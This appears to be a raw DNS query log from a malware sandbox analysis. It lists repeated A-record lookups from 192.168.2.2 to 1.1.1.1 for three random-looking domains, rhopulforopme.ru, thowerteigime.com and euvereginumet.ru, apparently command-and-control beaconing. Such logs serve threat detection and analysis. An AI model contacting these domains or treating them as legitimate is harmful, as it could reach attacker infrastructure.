                        Apr 26, 2023 12:39:20.239778996 CEST192.168.2.21.1.1.10xd1c6Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:20.619488955 CEST192.168.2.21.1.1.10xe78eStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:20.644637108 CEST192.168.2.21.1.1.10x1112Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:20.734090090 CEST192.168.2.21.1.1.10xcb6fStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:21.073558092 CEST192.168.2.21.1.1.10x3542Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:21.096513987 CEST192.168.2.21.1.1.10xfd31Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:21.176198006 CEST192.168.2.21.1.1.10x6cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:21.462631941 CEST192.168.2.21.1.1.10x40ebStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:21.488512039 CEST192.168.2.21.1.1.10x9e8fStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:21.571495056 CEST192.168.2.21.1.1.10xb7d8Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:21.932694912 CEST192.168.2.21.1.1.10x3082Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:21.955167055 CEST192.168.2.21.1.1.10x2768Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:21.979007959 CEST192.168.2.21.1.1.10xde70Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:22.286385059 CEST192.168.2.21.1.1.10xdb3dStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:22.401173115 CEST192.168.2.21.1.1.10xd7a3Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:22.448515892 CEST192.168.2.21.1.1.10xbe90Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:22.764460087 CEST192.168.2.21.1.1.10x9a53Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:22.789333105 CEST192.168.2.21.1.1.10x17edStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:22.813225985 CEST192.168.2.21.1.1.10xda78Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:23.124068022 CEST192.168.2.21.1.1.10x57f3Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:23.148073912 CEST192.168.2.21.1.1.10xe63Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:23.242269993 CEST192.168.2.21.1.1.10x5886Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:23.611525059 CEST192.168.2.21.1.1.10xda74Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:23.754708052 CEST192.168.2.21.1.1.10xb657Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:23.781591892 CEST192.168.2.21.1.1.10xcf05Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:24.128801107 CEST192.168.2.21.1.1.10xbe36Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:24.158813953 CEST192.168.2.21.1.1.10x22a5Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:24.183815956 CEST192.168.2.21.1.1.10x4d9cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:24.506140947 CEST192.168.2.21.1.1.10x410dStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:24.542625904 CEST192.168.2.21.1.1.10xaa81Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:24.571949005 CEST192.168.2.21.1.1.10x27d1Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:24.869878054 CEST192.168.2.21.1.1.10xca5cStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:24.984281063 CEST192.168.2.21.1.1.10xf723Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:25.028326035 CEST192.168.2.21.1.1.10x8e39Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:25.354466915 CEST192.168.2.21.1.1.10x7Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:25.467735052 CEST192.168.2.21.1.1.10x7485Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:25.495034933 CEST192.168.2.21.1.1.10x4048Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:25.802589893 CEST192.168.2.21.1.1.10x8157Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:25.826447964 CEST192.168.2.21.1.1.10xc026Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:25.890778065 CEST192.168.2.21.1.1.10x7052Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:26.182188988 CEST192.168.2.21.1.1.10x992bStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:26.208180904 CEST192.168.2.21.1.1.10x8e5eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:26.230973959 CEST192.168.2.21.1.1.10x69ceStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:26.514023066 CEST192.168.2.21.1.1.10x3541Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:26.536528111 CEST192.168.2.21.1.1.10x7a0eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:26.702773094 CEST192.168.2.21.1.1.10x2086Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:27.002733946 CEST192.168.2.21.1.1.10xd551Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:27.027327061 CEST192.168.2.21.1.1.10x7878Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:27.055802107 CEST192.168.2.21.1.1.10x7ca6Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:27.408823967 CEST192.168.2.21.1.1.10xa2a7Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:27.431654930 CEST192.168.2.21.1.1.10x5327Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:27.459875107 CEST192.168.2.21.1.1.10x3f0dStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:27.750652075 CEST192.168.2.21.1.1.10x4976Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:27.775496006 CEST192.168.2.21.1.1.10x8bf2Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:27.800120115 CEST192.168.2.21.1.1.10xe1faStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:28.072055101 CEST192.168.2.21.1.1.10x28a5Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:28.095869064 CEST192.168.2.21.1.1.10x8a38Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:28.127341986 CEST192.168.2.21.1.1.10x4f2aStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:28.431988001 CEST192.168.2.21.1.1.10xe8e7Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:28.454859972 CEST192.168.2.21.1.1.10xcdfbStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:28.477427006 CEST192.168.2.21.1.1.10x54f9Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:28.761188984 CEST192.168.2.21.1.1.10x1c24Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:28.792526960 CEST192.168.2.21.1.1.10xa58bStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:28.865966082 CEST192.168.2.21.1.1.10xb35Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:29.164788961 CEST192.168.2.21.1.1.10x6b54Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:29.187830925 CEST192.168.2.21.1.1.10x35fbStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:29.220557928 CEST192.168.2.21.1.1.10x175Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:29.526858091 CEST192.168.2.21.1.1.10x95acStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:29.680283070 CEST192.168.2.21.1.1.10xa591Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:29.705677986 CEST192.168.2.21.1.1.10xcc12Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:30.046569109 CEST192.168.2.21.1.1.10x208fStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:30.161818027 CEST192.168.2.21.1.1.10xfa4dStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:30.185216904 CEST192.168.2.21.1.1.10x325aStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:30.514914036 CEST192.168.2.21.1.1.10xf23aStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:30.537553072 CEST192.168.2.21.1.1.10x752eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:30.565566063 CEST192.168.2.21.1.1.10x6000Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:30.852807999 CEST192.168.2.21.1.1.10xb6ebStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:31.035161018 CEST192.168.2.21.1.1.10x3594Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:31.058480024 CEST192.168.2.21.1.1.10x5508Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:31.339174032 CEST192.168.2.21.1.1.10x3157Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:31.362051010 CEST192.168.2.21.1.1.10x65b3Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:31.384969950 CEST192.168.2.21.1.1.10x2c7bStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:31.686476946 CEST192.168.2.21.1.1.10x2504Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:31.710948944 CEST192.168.2.21.1.1.10xe6c2Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:31.733556986 CEST192.168.2.21.1.1.10x87ddStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:32.163151979 CEST192.168.2.21.1.1.10x75d6Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:32.185923100 CEST192.168.2.21.1.1.10x6da0Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:32.208529949 CEST192.168.2.21.1.1.10xc401Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:33.027686119 CEST192.168.2.21.1.1.10xd759Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:33.057111025 CEST192.168.2.21.1.1.10xf847Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:33.082050085 CEST192.168.2.21.1.1.10xf56bStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:33.510412931 CEST192.168.2.21.1.1.10x24ecStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:33.533642054 CEST192.168.2.21.1.1.10x4129Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:33.564184904 CEST192.168.2.21.1.1.10x9110Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:33.955858946 CEST192.168.2.21.1.1.10x4784Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:34.142606974 CEST192.168.2.21.1.1.10x9d65Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:34.166587114 CEST192.168.2.21.1.1.10x7f5bStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:34.523588896 CEST192.168.2.21.1.1.10xfd09Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:34.545706034 CEST192.168.2.21.1.1.10x4f35Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:34.570679903 CEST192.168.2.21.1.1.10x4b63Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:34.946841955 CEST192.168.2.21.1.1.10x3017Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:35.156472921 CEST192.168.2.21.1.1.10x7988Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:35.190511942 CEST192.168.2.21.1.1.10x4ccStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:35.655541897 CEST192.168.2.21.1.1.10x709eStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:35.684778929 CEST192.168.2.21.1.1.10xd73aStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:35.710496902 CEST192.168.2.21.1.1.10xf193Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.132606983 CEST192.168.2.21.1.1.10xdfStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.162673950 CEST192.168.2.21.1.1.10x95d9Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.193542957 CEST192.168.2.21.1.1.10x1ffdStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.585283995 CEST192.168.2.21.1.1.10x4f3eStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.607999086 CEST192.168.2.21.1.1.10xd18bStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.631325960 CEST192.168.2.21.1.1.10x9582Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.913157940 CEST192.168.2.21.1.1.10x71ebStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.937490940 CEST192.168.2.21.1.1.10x6c9cStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.967185974 CEST192.168.2.21.1.1.10x3eb8Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:37.281141996 CEST192.168.2.21.1.1.10x7b14Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:37.305591106 CEST192.168.2.21.1.1.10x120Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:37.328907967 CEST192.168.2.21.1.1.10x248Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:37.637197971 CEST192.168.2.21.1.1.10x3ca9Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:37.768557072 CEST192.168.2.21.1.1.10x3dddStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:37.871576071 CEST192.168.2.21.1.1.10xf887Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.197439909 CEST192.168.2.21.1.1.10x1b52Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.232804060 CEST192.168.2.21.1.1.10x39ccStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.255434036 CEST192.168.2.21.1.1.10xb5b3Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.570481062 CEST192.168.2.21.1.1.10x204bStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.597986937 CEST192.168.2.21.1.1.10x272bStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.664870024 CEST192.168.2.21.1.1.10x9b76Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.958209991 CEST192.168.2.21.1.1.10x1a31Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.985553026 CEST192.168.2.21.1.1.10xaa3eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.042085886 CEST192.168.2.21.1.1.10x28d3Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.351525068 CEST192.168.2.21.1.1.10xc7bfStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.374178886 CEST192.168.2.21.1.1.10x8662Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.398211956 CEST192.168.2.21.1.1.10x6d54Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.682035923 CEST192.168.2.21.1.1.10xc493Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.707849979 CEST192.168.2.21.1.1.10x174eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.730360031 CEST192.168.2.21.1.1.10xef36Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.007927895 CEST192.168.2.21.1.1.10x36Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.035480976 CEST192.168.2.21.1.1.10xe425Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.063458920 CEST192.168.2.21.1.1.10x66ecStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.333431959 CEST192.168.2.21.1.1.10xb35Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.356144905 CEST192.168.2.21.1.1.10x1cdcStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.428198099 CEST192.168.2.21.1.1.10xb4a0Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.691144943 CEST192.168.2.21.1.1.10x3805Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.805979967 CEST192.168.2.21.1.1.10xef79Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.836028099 CEST192.168.2.21.1.1.10xc5d1Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.118069887 CEST192.168.2.21.1.1.10x2a0aStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.140348911 CEST192.168.2.21.1.1.10x1bc5Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.210220098 CEST192.168.2.21.1.1.10xe0bStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.495321035 CEST192.168.2.21.1.1.10x3f95Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.519398928 CEST192.168.2.21.1.1.10x607aStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.544898033 CEST192.168.2.21.1.1.10xc621Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.843954086 CEST192.168.2.21.1.1.10x1f6fStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.893544912 CEST192.168.2.21.1.1.10x66b1Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.920078039 CEST192.168.2.21.1.1.10x551bStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:42.197684050 CEST192.168.2.21.1.1.10xa21fStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:42.222547054 CEST192.168.2.21.1.1.10xda4eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:42.261782885 CEST192.168.2.21.1.1.10x3ae7Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:42.512162924 CEST192.168.2.21.1.1.10x1ac2Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:42.535978079 CEST192.168.2.21.1.1.10xb6cdStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:42.563771009 CEST192.168.2.21.1.1.10x2f32Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:42.824858904 CEST192.168.2.21.1.1.10x693aStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:42.847652912 CEST192.168.2.21.1.1.10xa30bStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:42.878482103 CEST192.168.2.21.1.1.10xe2edStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:43.137412071 CEST192.168.2.21.1.1.10x60fdStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:43.161530972 CEST192.168.2.21.1.1.10xa88aStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:43.189310074 CEST192.168.2.21.1.1.10x3ec9Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:43.501101017 CEST192.168.2.21.1.1.10xa451Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:43.524477959 CEST192.168.2.21.1.1.10x8b2aStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:43.548476934 CEST192.168.2.21.1.1.10xb7bStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:43.831583023 CEST192.168.2.21.1.1.10x1b5aStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:43.854299068 CEST192.168.2.21.1.1.10x414cStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:43.878312111 CEST192.168.2.21.1.1.10xf0ccStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:44.251781940 CEST192.168.2.21.1.1.10x91eStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:44.274286032 CEST192.168.2.21.1.1.10x500eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:44.297103882 CEST192.168.2.21.1.1.10xf1cbStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:44.578454018 CEST192.168.2.21.1.1.10x1b57Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:44.611851931 CEST192.168.2.21.1.1.10x8e29Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:44.637315989 CEST192.168.2.21.1.1.10x2570Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:45.043112993 CEST192.168.2.21.1.1.10x27f1Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:45.070739031 CEST192.168.2.21.1.1.10x82bcStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:45.104144096 CEST192.168.2.21.1.1.10x978Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:45.389152050 CEST192.168.2.21.1.1.10x571fStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:45.414143085 CEST192.168.2.21.1.1.10x3e05Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:45.436789036 CEST192.168.2.21.1.1.10x7b3aStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:45.721641064 CEST192.168.2.21.1.1.10x2c5dStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:45.745240927 CEST192.168.2.21.1.1.10x8e19Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:45.774507999 CEST192.168.2.21.1.1.10xd20cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:46.063013077 CEST192.168.2.21.1.1.10xe879Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:46.089236021 CEST192.168.2.21.1.1.10xa634Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:46.114190102 CEST192.168.2.21.1.1.10x6a4cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:46.400913000 CEST192.168.2.21.1.1.10x4fedStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:46.423901081 CEST192.168.2.21.1.1.10xeed4Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:46.446404934 CEST192.168.2.21.1.1.10x4a45Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:46.718122005 CEST192.168.2.21.1.1.10xdc11Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:46.748420000 CEST192.168.2.21.1.1.10x9c3cStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:46.771853924 CEST192.168.2.21.1.1.10x1e5eStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:47.197304964 CEST192.168.2.21.1.1.10x8851Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:47.220606089 CEST192.168.2.21.1.1.10x4377Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:47.244334936 CEST192.168.2.21.1.1.10x158eStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:47.557291031 CEST192.168.2.21.1.1.10x1d86Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:47.584383011 CEST192.168.2.21.1.1.10x7971Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:47.608306885 CEST192.168.2.21.1.1.10x20dfStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:47.885262966 CEST192.168.2.21.1.1.10xb794Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
